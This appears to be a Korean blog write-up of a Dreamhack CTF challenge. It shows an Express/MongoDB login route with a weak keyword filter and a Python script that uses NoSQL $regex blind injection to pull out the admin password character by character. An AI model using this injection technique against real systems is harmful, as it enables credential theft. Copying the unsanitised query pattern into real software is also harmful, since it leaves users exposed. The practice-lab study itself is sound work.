문제정보
이 문제는 데이터베이스에 저장된 플래그를 획득하는 문제입니다.
플래그는 admin 계정의 비밀번호 입니다.
플래그의 형식은 DH{…} 입니다.
{‘uid’: ‘admin’, ‘upw’: ‘DH{32alphanumeric}’}
const express = require('express');
const app = express();
const mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true });
const db = mongoose.connection;
// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}
const BAN = ['admin', 'dh', 'admi'];
filter = function(data){
const dump = JSON.stringify(data).toLowerCase();
var flag = false;
BAN.forEach(function(word){
if(dump.indexOf(word)!=-1) flag = true;
});
return flag;
}
app.get('/login', function(req, res) {
if(filter(req.query)){
res.send('filter');
return;
}
const {uid, upw} = req.query;
db.collection('user').findOne({
'uid': uid,
'upw': upw,
}, function(err, result){
if (err){
res.send('err');
}else if(result){
res.send(result['uid']);
}else{
res.send('undefined');
}
})
});
app.get('/', function(req, res) {
res.send('/login?uid=guest&upw=guest');
});
app.listen(8000, '0.0.0.0');
import requests
import string
URL = 'http://host3.dreamhack.games:18206'
flag_set = string.ascii_letters + string.digits
flag = ''
for i in range(32):
for ch in flag_set:
response = requests.get(f'{URL}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}')
if response.text == 'admin':
flag += ch
break
print(f'DH{{{flag}}}')
방법 2)
방법 3)
[Dreamhack] blind-command (0) | 2022.11.08 |
---|---|
[Dreamhack] Carve Party (0) | 2022.09.30 |
[Dreamhack] simple_sqli (0) | 2022.09.22 |
[Dreamhack] CSRF-2 (0) | 2022.09.22 |
[Dreamhack]CSRF-1 (0) | 2022.09.22 |